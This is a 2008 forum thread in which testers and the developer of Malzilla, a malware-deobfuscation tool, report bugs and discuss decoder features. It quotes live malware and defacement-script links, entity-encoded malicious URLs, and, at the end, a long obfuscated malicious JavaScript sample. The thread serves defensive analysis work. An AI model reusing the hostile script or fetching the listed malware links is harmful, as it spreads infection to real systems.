Then tried a few other tricks, such as running it in windows 95 compatabilty mode, no change.

Checked the downloaded file, its 0 bytes !!

Ive not had a problem downloading from MDL before but may be worth trying another location. Like MysteryFCM ive had problems in the past using RS and i know others in the UK that have too, i think its something with our ISPs. But never had this kind of problem either here or from any of the other forums we all know and use.

If no one else reports the same problem, then it has to be my end.
Title: Re: MalZilla
Post by: Orac on June 20, 2008, 10:50:48 am
On a more positive note, just had the chance to use HTTPS for the first time, It worked great :)
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 10:52:23 am
Try to grab the files from here:
http://malzilla.sourceforge.net/builds/
Grab just the Malzilla.exe if you already have the DLL files from your previous downloads.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 10:58:57 am
On a more positive note, just had the chance to use HTTPS for the first time, It worked great :)

Here is how and where I test Malzilla:

Test of GZiped transfer - http://carsten.codimi.de/gzip.yaws/
Test of sent HTTP headers - http://c2.com/cgi/test/
Test of HTTPS - www.gmail.com - follow the first redirection

I still need to find where I can test FTP functionality. As for now, I'm doing it by testing the communication with FTP server of MyCity forum. I would like to find some test server, like the C2 test for HTTP headers.
Title: Re: MalZilla
Post by: Orac on June 20, 2008, 11:47:55 am
That download worked.

Just tested it on some live ftp malware links, and it works perfectly :)

Thanks Bobby thats a great job youve done, next time your in the UK i owe a few beers, afraid i cant help with suitable test sites, the only links ive got are either live malware, or they have been cleaned up.
Title: Re: MalZilla
Post by: tjs on June 20, 2008, 08:53:43 pm
I just downloaded the build from http://malzilla.sourceforge.net/builds/ and found several bugs:

* when using a link with hxxp, the tab name is named hxxp: instead of domain name
   example:
   hxxp://test.com (tab title: hxxp:)
   http://test.com (tab title: test.com)
* check for new updates says that a new update is available
* names in 'about' all have a space before them

Thanks,
TJS
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 08:58:51 pm
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:13:03 pm
I just downloaded the build from http://malzilla.sourceforge.net/builds/ and found several bugs:

* when using a link with hxxp, the tab name is named hxxp: instead of domain name
   example:
   hxxp://test.com (tab title: hxxp:)
   http://test.com (tab title: test.com)
* check for new updates says that a new update is available
* names in 'about' all have a space before them

Thanks,
TJS
Hi TJS,
- hxxp thing - fixed (fxp is translated to ftp too). I fixed this once, but it seems that it is gone after I reverted some changes (anyone recall my trying to make a splash screen?)
- spaces in about box fixed
- these are just test builds, neither the update info on the server or the version info in the Malzilla are set up. These are just test builds for us here. I'll set the right values for the formal release on SourceForge

Thanks for testing and reporting :)


Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Hi JohnC,

I have set a limit for that box (-255, 255), is that OK?
I'm not sure if it will work with Unicode in the way it works with ANSI/ASCII.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:31:18 pm
Please download fixed build from http://malzilla.sourceforge.net/builds/
I have fixed the bugs reported by TJS.
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:32:46 pm
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Hi JohnC,

I have set a limit for that box (-255, 255), is that OK?
I'm not sure if it will work with Unicode in the way it works with ANSI/ASCII.

That should be fine, thank you.
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:38:11 pm
If I try to retrieve this directory with Malzilla using CTRL + GET

ftp://193.253.223.43/tmp/trem/

I see

Quote
06-19-08  10:50PM                  681 1
06-19-08  10:50PM                20673 2
06-19-08  10:50PM                 1244 old
06-19-08  10:50PM                 1929 oldbisok

But if I try and get the file oldbisok, with just GET, I get the response:
"550 /tmp/trem/oldbisok: Le fichier spcifi est introuvable. "

But the file is definitely there and available for download because I grabbed it with an FTP client to make sure.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:45:26 pm
If I try to retrieve this directory with Malzilla using CTRL + GET

ftp://193.253.223.43/tmp/trem/

I see

Quote
06-19-08  10:50PM                  681 1
06-19-08  10:50PM                20673 2
06-19-08  10:50PM                 1244 old
06-19-08  10:50PM                 1929 oldbisok

But if I try and get the file oldbisok, with just GET, I get the response:
"550 /tmp/trem/oldbisok: Le fichier spcifi est introuvable. "

But the file is definitely there and available for download because I grabbed it with an FTP client to make sure.
I know that one, I tried it at testing Malzilla's FTP capabilities. I got the same results.
After that I wanted to be sure, and tried it from Firefox, and I got exactly the same error like in Malzilla.
Which FTP client you have used and succeed in downloading the file?
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:48:54 pm
FlashFXP. It sends RETR oldbisok
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:53:56 pm
Hmmm... I just got the file by using Total Commander's integrated FTP client.
So, there is something with settings, as Malzilla and Firefox does not get it, but normal FTP clients does.

There is one basic difference between a ordinary FTP client and Malzilla.
FTP client logs in on the servers, and does not log out until you say so.
Malzilla logs in and out for every click on GET button.

I'll take a look now at connection parameters, to see if it has something to do with PASSIVE settings.
Some servers needs that mode for transferring binary files.
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:58:58 pm
Sometimes a server will need PASV mode enabled/disabled to do stuff, in this case I just checked and it works either way. After logging in It also sends "TYPE I", if that helps you.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 10:34:00 pm
I saw where is the trick  ;D
The file on the server has a malformed name - it contains space at the end.
Malzilla trim the spaces at the begin and end of the URL by default. This way I prevent mistakes done by bad copy/paste of links from text files or websites.
It seems that FireFox does it too.

What to do now?
To trim spaces or not to trim?
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 11:19:07 pm
OK, get the new EXE from http://malzilla.sourceforge.net/builds/
Hold SHIFT at clicking on GET button, and the whitespaces will not be trimmed out.

To summarize the functions of GET button:

HTTP URLs:
- SHIFT = no trim

FTP URLs:
- SHIFT = no trim
- CTRL = LIST (works only if URL points to a folder)
- SHIFT + CTRL = no trim + LIST

btw. if you get LIST results and try to select (with cursor) behind the oldbiosk file, you will see that you have just one whitespace behind the filename.

FTP unit in Malzilla is now changed a lot (PASV + TYPE I + different parsing of filename and path from URL). Please report if something got broken that downloaded successfully with previous build (worked before changes, now does not work).
Title: Re: MalZilla
Post by: Orac on June 22, 2008, 11:50:33 am
Downloaded the update yesterday, all seems to be working as intended.

Just used the FTP (on the three RFI links i posted earlier today) and it works perfectly.

Havnt got any new HTTPS links to test (yet), will report back on this aspect when i get one  ;)
Title: Re: MalZilla
Post by: Orac on June 22, 2008, 05:54:46 pm
Possible bug

This link http://baptiste-bugnon.ch/help/ix.dat is a copy of Defacing Tool, the link to "//The Rules" want passed to the Links parser, neither was the link "<!-- saved from url=" at the top of the script.

Title: Re: MalZilla
Post by: bobby on June 22, 2008, 07:52:08 pm
No, it is not a bug, it is a feature :)
Malzilla does just what every webspider does - follow the HREF links.
It does not search for every link in the file. Links from textual part of file, links from comments and the links from scripts are not on the list in Link Parser.

I will now explain why is this done this way.
I DO have code that will catch every single URL, even from binary files, but this is far from perfect for HTML files.
Namely, most of the links in HTML files are relative paths (eg. "/images/image.gif")
Those would be missed by my other code that I have.
The current code in Malzilla is searching for every HREF, see if it is relative or absolute path. If it is relative, it search for Base tag (not necessary present in every HTML document). If Base is found, then the absolute paths are calculated relative to this basis. If Base tag is not present, the current URL (from URL box on Download tab) is taken as basis for calculating. See Link Parser tab, "URI base" field. If there stays "URI base (detected)", it means that the HTML contains Base tag. If stays "URI base (not detected)", it means that the URL from Download tab>URL box is used for calculation.

As an example, save any HTML page that does not contain Base tag in HTML header, and where some relative URLs are existing in the document.
Now open a new Download tab and load this document. Take a look at LinkParser - you will not have complete URLs anymore because Malzilla does not know the basis URL.
A solution is to save pages as 'Malzilla projects' (see Settings tab). This way extra info is added to every saved HTML page (does not destroy the page as the info is added in the form of comments). At loading such HTML in Malzilla next time, Malzilla will know the base URL, UserAgent and referrer used.

Now, I can add extra list in LinkParser that will contain all the links detected by a regular expression. That will catch every ABSOLUTE URL (relative URLs can't be found with such function), no matter if the URL is in comment or anywhere else in the document.

More info on Base tag:
http://www.w3schools.com/TAGS/tag_base.asp
Title: Re: MalZilla
Post by: Orac on June 22, 2008, 09:55:31 pm
Thanks for the explanation Bobby, iam surprised i hadnt noticed it before.

I can only assume this must have been the first time weve seen this particular exploit where the rules file hasnt been a HREF link, and as such the skiddie has in fact borked the script, which is meant to load that file as an add on to the scripts defacing abilities.

The particular link in this script has in fact been 404 for a couple of years now, which allways gives me a laugh, you would have thought they would check its availabilty before attempting to use the script for a RFI lol.



Title: Re: MalZilla
Post by: sowhat-x on June 28, 2008, 12:01:44 pm
Small glitch I've noticed in latest beta,not really important though...

1)Get the latest 'officially' released zip from sourceforge (0.9.3pre5) and extract it...
2)Extract latest devel/test build of malzilla.exe (overwriting the older one),
run it,then simply press the "Mini Html View" button...
"Cannot create file "C:\path-to-malzilla-dir\Cache\tempview".The system cannot find blah-blah..."

Maybe it should automatically create the "Cache" folder upon startup or something...

Title: Re: MalZilla
Post by: bobby on June 28, 2008, 01:37:16 pm
Indeed, Cache folder is created when you do the first download.
I'll correct this bug.

Thanks ;)
Title: Re: MalZilla
Post by: tjs on July 15, 2008, 09:46:23 pm
ISC is reporting on some new javascript trickery:
http://isc.sans.org/diary.html?storyid=4724

Thanks,
TJS
Title: Re: MalZilla
Post by: tjs on July 16, 2008, 06:24:27 pm
Bug & Suggestions:

I think there's a bug in the latest beta build involving the Hex (%) decoder. The bug doesn't exist in older variants, and I was able to repro the issue on several machines.

Issue: hex encoded strings are not decoded properly.
Example: <script src=http://%7A%73%68%61%63%6B%2E%63%6E> decodes to:
<script src=http:?zshack.c6E>

This is incorrect. %7A%73%68%61%63%6B%2E%63%6E should resolve as zshack.cn.

---

Next, some suggestions for the decoder section-- i've started seeing some malware sites using various IP encoding schemes to obfuscate their payload addresses. They are simple to reverse, but it would be nice to have one built into malzilla. Here are some examples:

hex IP encoding
Octal IP encoding
DWord IP encoding
Hybrid encoding (have fun!)

Here are some examples:

http://207.46.197.32
---------------------
http://0xCF.0x2E.0xC5.0x20
http://0317.056.0305.040
http://00317.0056.00305.0040
http://3475948832
http://7770916128
http://12065883424
http://16360850720
http://0xCF2EC520

I can help you with the calculations if you aren't familiar with this stuff...

Great resouce: http://www.searchlores.org/obscure.htm (not malware)


Thanks!!
TJS
Title: Re: MalZilla
Post by: bobby on July 16, 2008, 06:48:41 pm
Thanks for reporting the bug. It is indeed a BUG.
If you use Decode hex button - you see the bug.
If you use right-click menu > Run script (internal) > decode hex - it works like it should.
I'll take a look what I did wrong.

I'll also take a look at that IP encoding. Thanks for mentioning this, I have forgot about such IP encoding. I saw that kind of obfuscation only once, a couple of years ago, and I forgot about it.
Title: Re: MalZilla
Post by: tjs on July 16, 2008, 08:11:30 pm
My pleasure, friend. :)
Title: Re: MalZilla
Post by: bobby on August 10, 2008, 07:28:06 pm
After a lot of time...
http://malzilla.sourceforge.net/builds/

Please download updated files from this folder (you do not need to download the DLL files if you already have them, these are not updated).

Changelog:

Bugfixes:
- Misc Decoders rewrite
- Cookies tab (in Download tab) fixed. It does not mix cookies from various tabs anymore
- Hex vies (in Download tab) fixed. Does not show wrong data (from wrong tab) anymore
- improvements in Mini HTML view
- other that I already forgot

Additions:
- new tool on Tools tab - IP converter (see TJS' post)
- decoder Templates

Decoder Templates are code snippets to be added to script before decoding. Some of the variables from snippets will be automatically replaced with values from Malzilla. See Docs folder, there is a list of variables that would be replaced in templates with values from Malzilla (e.g. malzilla.location.href will be replaced with the content of URL filed on Download tab).
This should help a bit at deobfuscating scripts that are using non-trivial DOM objects.
More templates to come.
All the templates need to be in Templates folder if you want them to appear on the list of templates.


So, if everything goes fine, this will be Malzilla 1.0

Things that are not implemented (and probably will not be implemented because of complexity):
- downloading from FTP on Clipboard Monitor tab
- multi-language interface (we have started this once, but it takes a lot of time that I do not have)
Title: Re: MalZilla
Post by: MysteryFCM on August 11, 2008, 12:45:40 pm
Nice one dude :)
Title: Re: MalZilla
Post by: MysteryFCM on August 11, 2008, 02:03:36 pm
Bobby,
Malzilla doesn't seem to detect the iFrame SRC's for the links or iFrames tab for the following;

http://www.sanseng.com/eng/Product.asp

/edit

My bad, forgot to click to send to links parser hehe
Title: Re: MalZilla
Post by: tjs on August 12, 2008, 05:53:41 pm
The 'IP converter' tool is excellent!! I really like the UI. I'll do some deep testing later on and let you know what I find. :)

TJS
Title: Re: MalZilla
Post by: CM_MWR on August 15, 2008, 10:13:45 pm
Quote
Reply #178 on: August 12, 2008, 12:53:41 PM

Quote
I'll do some deep testing later on and let you know what I find.

Spec tjs got into some pretty deep shit,eh?  ;D
Title: Re: MalZilla
Post by: brewt on August 17, 2008, 09:12:59 am
hmm, is there an easy way to decode these unicode html entities?
Code: [Select]
&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108

&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108
Title: Re: MalZilla
Post by: Orac on August 17, 2008, 09:33:48 am
hmm, is there an easy way to decode these unicode html entities?
Code: [Select]
&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108

&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108

Decoded
Code: [Select]
http://opana.cn/ya.htmlhttp://opana.cn/all.html
This was decoded, using the "Enter decimal ASCII here." box available here (http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html)
Title: Re: MalZilla
Post by: bobby on August 17, 2008, 02:06:21 pm
In Malzilla, you can do that on Misc Decoders tab.

btw. hopefully, I will release Malzilla 1.0 today - it will have most robust decoders ever (for unicode, hex, dec...)
Title: Re: MalZilla
Post by: bobby on August 17, 2008, 05:52:18 pm
Malzilla 1.0 released:
http://sourceforge.net/project/showfiles.php?group_id=203466
Title: Re: MalZilla
Post by: MysteryFCM on August 17, 2008, 08:50:29 pm
Nice one dude :)
Title: Re: MalZilla
Post by: Orac on August 18, 2008, 08:33:42 am
Thanks Bobby :)
Title: Re: MalZilla
Post by: tjs on August 19, 2008, 12:27:53 am
Congratulations!! This is great news!
Getting to v1.0 is a huge milestone! It's incredible how widely adopted this tool has become.

Keep up the fantastic work, Bobby!
TJS
Title: Re: MalZilla
Post by: JohnC on September 01, 2008, 10:51:55 pm
The following code gives Access Violations in Malzilla.

Code: [Select]
var uaigei=Array(63,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,44,21,55,40,22,1,53,39,38,0,0,0,0,0,0,20,42,0,37,3,54,15,4,36,11,12,59,10,32,58,9,19,16,25,26,28,51,48,24,7,49,56,0,0,0,0,0,0,5,8,52,14,17,2,27,18,43,47,13,41,45,30,31,29,50,57,33,35,6,23,62,61,60,34);var lszxla="osc5OV75aesD672vRks6uZHeur@eJeBhXs@eQkaPX4ceuZGPpY@@JpBPeYHaueYuFcaaW1YuR4euQM6GRyBQ@MsuoV6GSceGeHYDJesDhJqvbm2fSYChLYH5SeeuhJqvbm2fJaaPTm2e@V75aOMDWZMGtyGvXl@vBRceO4E5Js@vJR5Bu2VeBb7bosc5O1aaXY2eaOYbpma@hmaaupMSgYGhpYHRIkGPL72BX6B2Ls@vLa@BJ6M@@kfQFaBfg6M@pma@hmaaupMSgYGhpYHRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc6AmaPb7aP9mcQJl@v6T@6I1Q6I1BB@lGhpl@Q6VGBhea2tBcP6MV5Bb2vg6C@geseXZuPpREhDYHhpaVfI@VeBQChb7Ch6aBPBba2@kfQFaBfg6M@pma@hmaaupMgJ7CRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc60Y@v9mcQJl@v6TGB@lGhpl@Q6VGBhea2t1aPpY75XaV5BbYb@kqvbm2fgY@5aeYeJr2f4m75b62BIQVfa1BQRmQ6IB@eI@VfpYcfa1VQJmQ6IV@eI@VfLscfa1BPLmQ6IW@eI@Vful7fa1QRsmQ6I4vTI@VfoYcfa1Qg9mQ6I1aPI@Vfu7cfa1Q5JmQ6IB@vI@VfL2cfBbYbFY7eL7aQup@f0R@Bb6M@tyahgCVPSRGabpMSgYGhpYHRIkGPL72BI48hgmMBgY@5aOXucOVfp6cedpVgIbV5JC2eqm6pf1BPN6C5IbV5JC2eql6pf1Be9mcff1aPR2HTpQ8BI4@vI@VfIBVbosc5O4ahResSgYGhpYHR6M@6I4vQIbV5JC2eqY6pf1QeXM55R2GQIbV5JC2eqx6pf1QvBRceIBMGtyahgCVeaeYeT2@ehJqPXsGeJeYfzmuGRGeGpVY6JaaPIbYbFpGhGYGaJxahaaVfFlCeX1uvIbV5JC2eqm6pf1QPrs@v6aVPSRc60Y@vNC7ff1aPR2HTnQ8BIBGhaxEff1aPR2HTeQ8BIcGPgaVuB@VPXsGeJ6VfBbYbpma@hp@e@4E5Js@vJR5Bb2VfH6HhgmMBgY@5aOXGcOVfux@vXGXRIbV5JC2eqseucOVfx7vnIBMGX2c6uCaPXaVf0Y5oI@BPeYGvg2@6Fs@eSYGBhQ7bLs@vLa@BJ6M@pma@hp@e@4E5Js@vJR5Bb2VfHmMBgY@5aOXuWQ8BIQ5RgTQTHmMBgY@5aOXuRQ8BIcvormBBhT@eXW@5Jp@BIZugxmQ6JaaPTm2eayGhalaPBb62t4Ghpl@Q6VGBh775QO7eaesSgYGhpYHR6M@6IQEff1aPR2HTWM6pf1BRCmY6NYc5IbV5JC2eqsYucOVfgaXRIbV5JC2eqseucOVfx7vnIBMGX2c6uCaPXaVf0Y5oI@BPeYGvg2@6Fs@eSYGBhQ7bLs@vLa@BJ6M@pma@hp@e@TGPnCQTH25Wp725KYG5TYH5paBBhT@eXW@5Jp@BIZugxmQ6JaaPTm2eayGhalaPBb62t4Ghpl@Q6VGBhmaPpY75XCQuhQa2@e7bX2c6SYcekaVeT2@eBbYbgmGaX2c6gYH5RRceSYcSu7G@hJqvbm2feesSgYGhpYHR6M@6IMEff1aPR2HTW46pf1QgipMnpmMBgY@5aOXupQ8BIMGeIBMGtG76x625Je6uhJfPos@e61Q@XQEff1aPR2HTWV6pf1BP@4sGepMRIbV5JC2eqsYXcOVfXaBBhG76wm7ff1aPR2HTWZ6pf1BP617hBbe@X4XhIbV5JC2eqsYucOVfxRcPIbV5JC2eqm6pf1BP6ycebeGPa16Bh4ahRpMn6mMBgY@5aOXXcOVfaY5@IbV5JC2eqr6pf1BvpY@BFpGhGYGBh1BBhJq5J7avgp@fWbYb@kqPTpHhp6HeXCBeksHh6BM@tyahgCBQ@HsGtyahgCQvbmCPJ7aaXYHvOME5gsG@61VSm6YXAY6Xo1MBgY@5aOvucOVfoV6SSQBuWc5uGBeGSMu6RHsSRcYgAm6G1lYXI@Vf4muGilugm7Eff1aPR2HTRQ8BIV9SnVu6pZ6gWQBGS1YuGc5X4m6uRy6unM6uo1Q6IHeuRyYgR4suIbV5JC2eqC6pf1QuRHeuGHeuRH66ACeuRQQuRHeuRHeuRHeupyYfa1QuRHYXjCsu4mMBgY@5aOvucOVfRHeuRQQuRHeuG45uRH66RHeuRHeuRHeuRcYXI@VfoVHugHsXRMcff1aPR2HTRQ8BIZYXocG6pVGPoQQGnBshGcHhWyGhQMePgyHhS1Q6IyeXWc6XW1YSIbV5JC2eqC6pf1VSQZeGGc6XWcu64CegeQVgAx5gjlsu1asuS4Efa1MXjYYSnyEXS1MBgY@5aOvucOVfjCYXjeQXS46uGG6Sgy66S46G1CsuAC6S1legI@VfRysXg46gRBYff1aPR2HTRQ8BIy5XAm66p4sheQQGSVeGGH6Gjl5gWcESRZYXo1Q6IysuQy9XgVYgIbV5JC2eqC6pf1BuimegGceGSM6646YgmeQGnceGpZYXe1euWHYfa1VS4C6ueV6GQ1MBgY@5aOvucOVfWcESSQQXpyGGGGsui766py6upVeXAaeXix5GI@VfmCsSRZegTyYff1aPR2HTRQ8BIZsSoB66p4YgWQVSpM5uG16XjY6SWMYg4muuQ1Q6IV5GAl9Sm7EgIbV5JC2eqC6pf1MS4meGGc6Go1G6iC6XRQVXACsXA6YXgcsXo1EfaTGva2GBhJzv66@eJaQvbmCPJ7CTBeXBhkqvbm2fbeYeT2@ehJfh@cHeLYaeJp@vX4c5Js@vJY5eJeGPX72BIWchDYHhpmBBhJfhX4aPps5vpmaQIY2vJaV5JC2eqseGcOVfblC5B7cfa1aPR2HTWG6pf1M5B7cGIbQvbmCPJ7CTBeXBhJfQFaBhBb2vg6C@osc5O1GaAmaPb7aP9aBha1Mn6mMBgY@5aOXXcOVfapBSRC2eBmMBgY@5aO3XcOVfp6HeXmBBhBcP61GBh6cP6Z9e6MGBB1aPpY75XCBuhQa2Ls@vLa@BJ6M@@e7bBOMBhJf2tQ7bBx@BG7GhLaBBBHM5TlHhJlC5@MsGtBcP6MM5TlHhJlC5Bb7bkRHhTeGPX776nmaQpY@BI@s5LmaQR72fascedYahdYGa!m9nLmaQR77a7m2pXmMBtZMnJ72fJ2GPGeePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIrMBgY@5aOvXcOMDL77fBZMBI@357pcffJzDFpGhGYGaIbESQHeGTMeGXV@@JmMDf1Qpg23eIbVbdV@eJec6SY@v472vg6chT7aPO1BQkmQ6IV@eJecfdbVf7m2pXmMBtZBPaYGeX4aPps5vpmaQIY2vJCVfdbV5JC2eqseGcOMDblC5B7cfa1MDf1aPR2HTWG6pfZM5B7cGi7uGo4uXTysDf1aPR2HTRQ8Bdy6X4l66WMegRQBGe46SGHeuACeXjlEuQV9uo1MDf1Qpg23eIbVbd4XPpCMeIkGaJ2GPGpMSgYGhpYHRIkGPL72BI4vQdbV5JC2eqY6pfZQeXM55R2GQdbV5JC2eqx6pfZQvBRceI@VfIBMDf1Qpg23eIbVbI4XPpCVeSCaaumcQXTuhGYHnRsHhJaVuRBQpg23eIbVbd4XPpCQ5XeGaXl25XHXhglaP8sGeJaVfN6aeIR@eXc2vFmBBdbVf7m2pXmMBtZQvGCaaNC2eB72BRpGeXHXhpa@6I@vpI@B6W@BuBZMBI@357pcffJzDRs@v6eevGC2BRBQfFHVf723fOyQfOcaeRaBuBHVDO1Qp7mMDf1Qpg23eIbVbIycebeGP@Hahpa@fFHVPXsGeJ2357pcffJzDSY@vOc25WC2P@4E5Js@vJREhDYHhpaVfH6HhgrMBgY@5aOXGcOMDux@vXGXRdbV5JC2eqseucOMDx7vnIBMDf1Qpg23eIbVbdBGQWYaapCa5R7c69CaPXaVf0Y5oI@BPeYGvg2@6RBMDf1Qpg23eIbVbIc25WC2PX4XPX7@BB@357pcffJqf9p@f1m75um2fKYH5TeGPOTuPe72pg23eIbVbIVHPS62QueevRs25kpV5Jl25upH5Jm9ek62pg23eIbVbd4XPpCBhLxa5Wm25@V@eJec6AmaPb7aP9mcQJl@v61MnLmCDf1aPR2HTWQ8BdcaQXrc6jrMBgY@5aO3ucOMDJlX@SrMBgY@5aO8ucOMDGREhdbV5JC2eq76pfZMhpmQ6I1BBdbVf7m2pXmMBt1MnJ72ff2@P@MHhosa5gC76AmaPb7aPxY@@pxuQaY@BFpGhGY@6Oc3nyYuB7m2pXmMBt1Qeu77@ueGaCYceiaBPdla@6RGB7m2pXmMBt1Vgum2fDe6uOc8eO@HepkCeG2357pcffJqfR2HQul2e@QuQkm5BJrH5QaHeaJ@6WBQpg23eIbVbIMahGC2ee7Ga4lChiaQ5aOHeS2GB7m2pXmMBt1MQa7c6wmaQpY@BAac56MahGC2ee7GBB@357pcffJqf8Y@@p2357pcffJqff2@PX45eulaP7m2pXmMBtZMnJ72fQ6@5pe6PaYGeX4E5Js@vJREhDYHhpaVfwl8hgrMBgY@5aOXucOMDppMn6rMBgY@5aOXXcOMDamQ6I1BBdbVf7m2pXmMBt1MRXCBggmCegCVnJlavGY@f8Y@@p2357pcffJqfQ6@5ppVnIbV5JC2eqs6GcOVfOycebeGPaMe6js5RNY5pg23eIbVbd@epu4Chg6@5ppsDBbYb@kqbBx@Bb4avLlGPSlaBhkfPeYGvg2GaTm2efZBGdbYbkRHhTeGPX776nmaQpY@Bd@seIkGPL72fL2GhSlaQkeYfL2H5B7cGTBegi75g4x66QM5GRQQXgM5XG15Ggc66Q19STHsSAssXgyuXIHBQkeYfpYH5pmVa2WMeIkGPL77adBMGtc75QO2vJl2vXc9enp@eus@Pj6@eJaBPeYGvg2@6ITV67232pe@5RHeuWTBPeYcfa1QuI@VfR1BBhcHeLYaeJp@vX@HeLs@vBRce@1BPeC2eu6@vSRQ@QTQ56CCaPYcepY75Be6uIb62Ls@vLa@BJ6M@@kf2tJqvbm2fXR@5@ZBGRZQ6XRHh@ZQuArQ6SlcP@ZVgdbYvbm2fSaGPa2HhuesDJVaXpVESJVCXTGYSJV2GilsSJVCuTZeXJV2uSZeGJVaXoyuXJVCXoGYSJV2uS1eudbVbdVBvS4YgTVBvpBsSQVBv475XWVBvmm9uSVBvRy9uoVBvWcYS1rMBdVBvSGYueVBvncYggZMBtZBDTluuRG6DTCegAmuDT7uSR46DTYESpH6DTlYS1xuDTr6Xmx9DfZBDTY6g1r6DTY6ge19DfJzDJV2uS1eXJV7Xoc5gJV2uAaYSJV2Gi7YSdbMDJVauAY6gJV2gmCsuJV2upGYSJV2uSGYSdbVbdVBvAlsSTVBvn1sXTVBvocEXAYBvoVEXjYBvocYu1YBvo4EXAYBvgV@uRVBvT4EuJrMBtZBDTm6PnVGDTreGoV6DTCeuoV6DTl5uS46DTCsuoc6DTleupH6DTCsSnG6DT7eue19DfJzDJV2GiCsSJVauAreuJV2Gis5gJV2ueceuJV2uQVESJV2XRGYSJV2GmleXJVCXA7eudbVbdVBvpHeGiYBvQVsuAYBveVESjYBvRV5X1YBv1a6gAYBvjx5GpVBvjxEgjYBv1l5GSZMBtZBDTasuRc6DTmeXg4uDTxEgS4uDT66XmC6DTmEgTH6DTs6SSy6DTreugy9DfZBDTxYg1asDfJzDJV7gjx9Df4ChFOMDJV2GixEgJV7upVeXJV2Gmx9SJV7S4YYuJV2gilsudbMDJVaXSVsuJVagiYYudbVbdVBvT4YupVBvmCYgjYBvixuXmYBvjYuGeVBvRV5G4rMBdVBvT46geVBvjxEgdbM5LxHBdVBve4YgjrMBtZBDTCeX1luDTmsSe46DTxYugc6DT75ujxuDTr6gix9DfZBDTYEuma6DTY5Gn46DTxEgpHsDfJzDJV7gjxEgJV7gjYYuJVagec5uJV7gj79XJV7gjxEgJVCXpyeGJVCXRZeXJV7ujl6SJV7Xn1YgJV7XjxYgJV7XAxsXJV7umx6XJV7X1x6uJV7XAx6uJVCX4r6GJV7u1x6XJV7X1xsuJV7Xn1YgJVCXpy6XJVCXey6XJV7u1x6XJVCXey6XJVCujx6XJVCumxYgJV7uo4YuJVCumreXJVCug46uJVCuR4YuJVCuR4suJVCuW46GJVCuR46GJV7XQ1YXJVCuW4egJVCuo4suJVCuQ46XJVCup4suJVCue4eGJV7uo4euJVCumx6XdbYbHJfQFaBfSYChLYH5S6M@HJqvbm2fumcQ@TGva2HGHJhvg6C@HJzeIkGakRHhTeGPX776LmaPb7aP12GPGYcepaVfumcQJl@vIBMGHJzeIkc6SY@v472vg6chT7aP61MhasH5S6@PI@VfL2H5B7cG1l5XpcsSix66SV9X1eQXey6XG1uuAl66Rcugn16gjl6GilYgIBMGHJfQFaMeIkGBheqbosc5OQG@S775BpHP@V7eJlChbCaP642QJ2@eLRHBIVBvSZsuW1BBhQqbosc5OGchSeeueseuRHeuR@M5Slaa6mH5GGBeQl2vg6cedpQeJpHPpacBgbQueleGBb6OtyahgCQQIeeBRG2uLCshR4@uLeQQIlaBuGchSO6OtyahgCBeQxahge6vXYH5Ls@5JaVfJV7ffTHeLOVeulHBIVBvIbVeulHBXRHhBb6OtyahgCM5Se6eQxahgO6OtZ2QB2GP64C5X@GPXr@v6kVu24C5S6M5SOBaSlCGHJz5Ses5SpM5TmH5pmaQXr@BR@M5SlC6gBMGHJqvbm2fGeYeJr2f4m75b62BBb6OtyHegaBQ@HsGB2eQIO6QfbBBGOXQces5SOBeQl2vg6cedO6OtJaaHs@v6pMhJ6@e6He@R4@uLCshR4GBhQqbPeePulGvGYceppM5LmaQR7C5qC6pX4c5Js@vJl9eX775u2cnbpHPJaBBX@GPXr@v6O6OtQaOtQChb7Ch6aBPBba2HJf2HJfOtBcP6MM5TlHhJlC5Bb7bumcQ@cHeLYaeJp@vXZ75B7aP6ZQaBxc5beGPO475LeYfJa25aRGQplC6esYuIpQ56CCaueYuFcaaW1YuR4euQM6GRyBQ@MsuoV6GSceGeHYfOZaQk72Q@Hef6YGQda@v@HYa2WBQFmahGYcadBMGtQ7btQqbBx@Bb4avLlGPSlaBheqbosc5O1aPR2GaXYHvOME5gsG@61MhamQ6IQVfBb6Otc75QOaOtWchDeePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBb6OtWchDpM5J7aSp775BmGvpY@BgY@5aOvucOVfblC5B7cfa1aPR2HTRQ8BI4aQkkYujYeXgMEu1mMBgY@5aOXucOVf179SQQQXix9XGGsSis66eZsSQB6uQy9Xj6suIBMGHJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJVCuS46udBMGHJqvbm2fG67vbm2f@HBvXYH5Ls@5JaVfJV7ffTHeLOVeulHBIVBvIbVeulHBXRHhBb6OtyahgCVhI2HeLO@f@HBeQxahgO6OtyahgCM5SCahLY@f@HVuRHMBOQG@S775BpHPX@GPXr@v6O6OtZ2QB2GPOGVhI2HeLOc6aYced72QO@efSl25blGPBHVhI2HeLO@